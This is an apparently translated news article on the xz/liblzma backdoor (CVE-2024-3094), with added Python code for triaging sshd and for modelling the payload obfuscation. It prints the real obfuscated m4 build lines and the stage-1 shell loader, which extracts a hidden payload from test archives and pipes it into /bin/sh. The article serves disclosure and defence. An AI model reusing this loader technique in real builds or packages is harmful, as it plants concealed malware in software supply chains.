Backdoor discovered in the xz/liblzma library that allows unauthenticated access through sshd

A backdoor (CVE-2024-3094) has been identified in the XZ Utils package, which contains the liblzma library and the tools for working with data compressed in the ".xz" format. The backdoor allows interception and modification of data processed by applications linked against liblzma. Its primary target is the OpenSSH server, which in some distributions is linked with libsystemd, and libsystemd in turn uses liblzma. An sshd linked, directly or transitively, with the compromised library lets an attacker gain access to the SSH server without authentication.

The backdoor was present in the official 5.6.0 and 5.6.1 releases, published on February 24 and March 9, which made it into a number of distributions and repositories, for example Gentoo, Arch Linux, Debian sid/unstable, Fedora Rawhide and 40-beta, openSUSE factory and tumbleweed, LibreELEC, Alpine edge, Solus, NixOS unstable, OpenIndiana, OpenMandriva rolling, pkgsrc current, Slackware current and Manjaro testing. All users of xz 5.6.0 and 5.6.1 are advised to roll back to version 5.4.6 immediately.

Among the mitigating factors, the backdoored liblzma did not make it into the stable releases of the major distributions, although openSUSE Tumbleweed and Fedora 40-beta were affected. Arch Linux and Gentoo shipped the compromised xz version but were not exposed to the attack, because they do not apply the systemd-notify patch to OpenSSH; it is that patch which causes sshd to be linked against liblzma. The backdoor only targets x86_64 systems running the Linux kernel with the glibc C library.
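Because exposure depends on whether sshd actually maps liblzma (via libsystemd) and on which xz release provides it, a practical first triage step is to read /proc/<pid>/maps of the running sshd. The following is an added example written for this article, not code from the advisory or from the xz project; it only relies on the kernel's maps format, and the sample maps text is constructed to resemble an sshd on an affected distribution.

```python
"""Triage helper: does a running process (e.g. sshd) map liblzma, and is it
one of the backdoored xz releases (5.6.0, 5.6.1) named in the advisory?

Added example, not code from the advisory or from the xz project. It reads
/proc/<pid>/maps, a kernel-defined text format; the sample maps text below
is constructed for the offline demo."""
import re
import sys

BACKDOORED_VERSIONS = {"5.6.0", "5.6.1"}  # releases named in the advisory

# /proc/<pid>/maps line: address perms offset dev inode [pathname]
_MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S+)\s+\S+\s+\S+\s+\d+\s*(?P<path>.*)$"
)
# /proc shows the resolved file name, e.g. liblzma.so.5.6.1; a bare
# liblzma.so.5 means the version is not visible in the mapping itself.
_LZMA_SONAME = re.compile(r"liblzma\.so\.(?P<ver>[0-9.]+)$")


def mapped_libraries(maps_text):
    """Return the set of distinct file-backed mappings in /proc/<pid>/maps text."""
    paths = set()
    for line in maps_text.splitlines():
        m = _MAPS_LINE.match(line.strip())
        if m is None:
            continue
        path = m.group("path").strip()
        if path.startswith("/"):  # skip [heap], [stack], anonymous maps
            paths.add(path)
    return paths


def liblzma_version(path):
    """Version embedded in the mapped liblzma file name, or None for other files."""
    m = _LZMA_SONAME.search(path)
    if m is None:
        return None
    return m.group("ver").rstrip(".")


def triage(maps_text):
    """Classify a process from its maps text:
    'no-liblzma', 'backdoored', 'unknown-version' (only liblzma.so.5 visible,
    confirm with `xz --version`) or 'other-version'."""
    versions = [liblzma_version(p) for p in mapped_libraries(maps_text)]
    versions = [v for v in versions if v is not None]
    if not versions:
        return "no-liblzma"
    if any(v in BACKDOORED_VERSIONS for v in versions):
        return "backdoored"
    if any(v.count(".") < 2 for v in versions):
        return "unknown-version"
    return "other-version"


# Constructed sample: sshd that pulled in liblzma 5.6.1 through libsystemd.
SAMPLE_MAPS = """\
7f1d6c000000-7f1d6c021000 r--p 00000000 fd:01 1311 /usr/lib/x86_64-linux-gnu/libsystemd.so.0.38.0
7f1d6c021000-7f1d6c0a0000 r-xp 00021000 fd:01 1311 /usr/lib/x86_64-linux-gnu/libsystemd.so.0.38.0
7f1d6c200000-7f1d6c204000 r--p 00000000 fd:01 1204 /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
7f1d6c204000-7f1d6c22c000 r-xp 00004000 fd:01 1204 /usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1
7ffd5e3c0000-7ffd5e3e1000 rw-p 00000000 00:00 0 [stack]
"""

if __name__ == "__main__":
    # Usage: python3 triage.py <pid of sshd>; without a pid the sample is used.
    pid = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(f"/proc/{pid}/maps").read() if pid else SAMPLE_MAPS
    print(triage(text))
```

Run it as root against the pid of the listening sshd (`pidof sshd` or `systemctl show -p MainPID sshd`). A result of "no-liblzma" means the systemd-notify linkage is absent and the sshd is not reachable by this backdoor; "backdoored" means the process must be treated as compromised regardless of what `xz --version` says afterwards, because the library was already loaded.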

The code that activates the backdoor was hidden in m4 macros in the build-to-host.m4 file used by the autotools build system. During the build, a sequence of obfuscated operations over two archives from the test suite (bad-3-corrupt_lzma2.xz and good-large_compressed.lzma), ostensibly there to test decompression correctness, produced an object file containing malicious code; that object was linked into liblzma and altered the behaviour of some of its functions. The m4 macros that trigger the backdoor were present in the release tarballs but not in the Git repository, while the malicious test archives were committed to the repository. In other words, whoever planted the backdoor had access both to the repository and to the release-generation process.

In applications that use liblzma, the malicious changes can be used to intercept or modify data, or to alter the behaviour of sshd. In particular, the malicious code hooks the RSA_public_decrypt function in order to bypass sshd authentication. The backdoor includes anti-detection measures: it stays dormant when the TERM environment variable is set (i.e. when the process is started from a terminal) or when the LD_DEBUG or LD_PROFILE variables are set, and it only activates when the executable being run is /usr/sbin/sshd. It also contains a mechanism for detecting execution under a debugger.

Specifically, the m4/build-to-host.m4 file contains the following (the ellipsis marks code omitted in the source):

    gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
    …
    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'

The grep pattern matches a line consisting of four '#', five alphanumerics and four '#', i.e. the "####Hello####" / "####World####" markers planted in the crafted test file. The sed invocation, whose script is only an `r` command naming a nonexistent file, prints its input unchanged and is just an obfuscated cat; the result is then piped through a byte-remapping `tr` held in $gl_path_map and decompressed with xz -d.

In the first stage, the grep locates tests/files/bad-3-corrupt_lzma2.xz, which after the byte remapping and decompression yields the following script:

    ####Hello####
    #345U211267$^D330^W
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    [ ! $(uname) = "Linux" ] && exit 0
    eval `grep ^srcdir= config.status`
    if test -f ../../config.status;then
    eval `grep ^srcdir= ../../config.status`
    srcdir="../../$srcdir"
    fi
    export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
    ####World####

The chain of head commands carves alternating 1024-byte gaps and 2048-byte slices out of the decompressed good-large_compressed.lzma (sixteen times, then a final 724-byte slice), `tail -c +31233` discards everything before byte 31233 of the carved data, the `tr` call undoes a byte-value permutation, and the result is a raw LZMA1 stream that is decompressed and fed straight into /bin/sh as the next stage.
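To make the two obfuscation layers concrete, here is an added example (written for this article, not code from the xz tarball or from any published analysis) that models them in Python: the `tr "\t \-_" " \t_\-"` byte swap that $gl_path_map applies to bad-3-corrupt_lzma2.xz, and the head/tail carving plus the second `tr` from the extracted script above. It also provides the inverse table, which is what a reverser needs to recover hidden bytes from a modified archive. The carve constants (16 repetitions, final 724 bytes, `tail -c +31233`) are those of the script above; the input blob is constructed, since the real test archives are not reproduced here.

```python
"""Byte-level model of the obfuscation steps used at xz build time: the
tr(1) byte remapping from build-to-host.m4 ($gl_path_map) and the head/tail
carving plus second tr(1) remapping in the extracted stage-1 script.
Added example, not code from the xz tarball or from the original analysis;
the input blob is constructed, the real test archives are not used."""


def parse_tr_set(spec):
    """Expand a tr(1) SET argument (octal escapes, \\t, \\-, a-b ranges) into byte values."""
    tokens = []  # (byte value, was_escaped)
    i = 0
    while i < len(spec):
        if spec[i] == "\\":
            j = i + 1
            if spec[j] in "01234567":  # \NNN: up to three octal digits
                k = j
                while k < len(spec) and k < j + 3 and spec[k] in "01234567":
                    k += 1
                tokens.append((int(spec[j:k], 8), True))
                i = k
            else:  # \t, \n, or \c for a literal c (e.g. \- is a literal dash)
                tokens.append(({"t": 9, "n": 10}.get(spec[j], ord(spec[j])), True))
                i = j + 1
        else:
            tokens.append((ord(spec[i]), False))
            i += 1
    out = []
    k = 0
    while k < len(tokens):
        # an unescaped '-' between two tokens denotes an inclusive range
        if k + 2 < len(tokens) and tokens[k + 1] == (ord("-"), False):
            lo, hi = tokens[k][0], tokens[k + 2][0]
            out.extend(range(lo, hi + 1))
            k += 3
        else:
            out.append(tokens[k][0])
            k += 1
    return out


def tr_table(set1, set2):
    """Translation table equivalent to `tr SET1 SET2` (GNU tr pads a short SET2 with its last byte)."""
    s1 = bytes(parse_tr_set(set1))
    s2 = bytes(parse_tr_set(set2))
    if len(s2) < len(s1):
        s2 += s2[-1:] * (len(s1) - len(s2))
    return bytes.maketrans(s1, s2[: len(s1)])


def invert_table(table):
    """Inverse of a 256-byte permutation table, i.e. the table that undoes the remapping."""
    inv = bytearray(256)
    for src, dst in enumerate(table):
        inv[dst] = src
    return bytes(inv)


# Stage 0: $gl_path_map swaps tab<->space and '-'<->'_'; applied to the
# "corrupt" bad-3-corrupt_lzma2.xz this yields a valid .xz stream.
STAGE0_TR = tr_table(r"\t \-_", r" \t_\-")

# Stage 1: the tr call in the extracted script, a permutation of all 256 byte values.
STAGE1_TR = tr_table(r"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113", r"\0-\377")


def carve_stage1(blob, repeats=16, skip=1024, take=2048, final_take=724, tail_from=31233):
    """The head/tail chain of the stage-1 script: `repeats` times drop `skip` bytes
    and keep `take`, then drop `skip` and keep `final_take`, then `tail -c +tail_from`
    (1-based byte offset). The defaults are the script's own constants."""
    out = bytearray()
    pos = 0
    for _ in range(repeats):
        pos += skip
        out += blob[pos : pos + take]
        pos += take
    pos += skip
    out += blob[pos : pos + final_take]
    return bytes(out[tail_from - 1 :])


def recover_stage2_stream(blob):
    """Carve then remap, as the script does; the result is the raw LZMA1 stream
    that the script hands to `xz -F raw --lzma1 -dc | /bin/sh`."""
    return carve_stage1(blob).translate(STAGE1_TR)


def demo():
    # Constructed stand-in for the decompressed good-large_compressed.lzma.
    blob = bytes(range(256)) * 200
    stream = recover_stage2_stream(blob)
    # The table is a bijection, so the hiding step is losslessly invertible,
    # and the carve keeps 16*2048 + 724 - 31232 = 2260 bytes.
    assert sorted(STAGE1_TR) == list(range(256))
    assert stream.translate(invert_table(STAGE1_TR)) == carve_stage1(blob)
    return len(stream)


if __name__ == "__main__":
    print(demo())
```

The point of modelling it this way rather than re-running the shell pipeline is that the table becomes inspectable: STAGE1_TR maps byte 0x4c to 0x00 and byte 0x00 to 0xd0, so a "corrupt" archive that is actually a remapped payload can be recognised by applying the inverse table and checking for a valid LZMA header, without executing anything from the tarball.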

It is still not clear exactly how the attackers gained the access to the xz project infrastructure that made this possible, nor how many users and projects have been compromised as a result of the backdoor. The suspected author of the backdoor (JiaT75 - Jia Tan), who committed the archives with the malicious content to the repository, corresponded with Fedora developers and sent pull requests to Debian about moving the distribution to the xz 5.6.0 branch, and raised no suspicion, since he had been participating in xz development for two years and was the second most active contributor by number of changes. Besides xz itself, the suspected author also took part in the development of xz-java and xz-embedded, and a few days earlier had been added to the maintainers of the XZ Embedded project used in the Linux kernel.

The malicious change was discovered while investigating excessive CPU usage and errors reported by valgrind when connecting over ssh to Debian-based systems. Notably, the xz 5.6.1 release included changes prepared by the suspected backdoor author in response to complaints about sshd slowdowns and crashes that appeared after upgrading to the backdoored xz 5.6.0. In addition, last year Jia Tan made changes that were incompatible with the "-fsanitize=address" checking mode, which led to it being disabled during fuzz testing.

Source: opennet.ru
